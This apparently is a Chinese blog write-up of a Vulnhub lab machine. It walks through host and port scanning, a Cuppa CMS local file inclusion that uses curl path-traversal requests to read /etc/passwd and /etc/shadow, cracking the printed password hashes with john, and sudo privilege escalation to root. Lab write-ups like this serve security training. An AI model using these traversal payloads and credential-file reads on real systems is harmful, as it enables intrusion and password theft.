五一加调休在家躺尸真舒服,咸鱼生活真美啊,可惜结束的太快,啊,继续打靶
下载地址:https://github.com/rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-
其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。
下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。
攻击机(kali)IP:192.168.59.143
主机发现与端口扫描
1、netdiscover 扫描主机 IP ,发现主机 IP 为 192.168.59.137
3、nmap 扫描主机端口开放,发现 21、22、80、3306 端口开放
nmap -p- -A 192.168.59.137
web渗透
1、dirb 扫描网站目录
dirsearch -u "http://192.168.59.137"
/administrator、/installation、/wordpress/
2、浏览器访问 http://192.168.59.137/administrator
3、网站 title 提示使用了 Cuppa CMS ,
4、查找历史漏洞,发现有个本地文件包含漏洞
searchsploit cuppa
5、将其复制出来看一下
searchsploit -m php/webapps/25971.txt
文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件
6、web界面上尝试
没有保存,但是没有返回结果的界面,用 curl 试试
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.59.137/administrator/alerts/alertConfigField.php
在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.59.137/administrator/alerts/alertConfigField.php
发现了 root 、www-data 、 w1r3s 用户的密码,尝试用 john 破解
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.
john pwd.txt
# 得到密码
www-data:www-data(/usr/sbin/noglogin 不能登陆)
w1r3s:computer
提权
1、ssh 远程连接 w1r3s 用户
ssh w1r3s@192.168.59.137
2、尝试 sudo 提权,发现该用户可以在任何地方执行任何名称文件获取 root 权限
sudo -l
3、随便写一个 sh 文件,赋权并以 sudo 命令执行,成功提权
echo '/bin/bash' >> root.sh
chmod +x root.sh
sudo ./root.sh
4、在 /root 目录下找到 flag.txt
至此打靶结束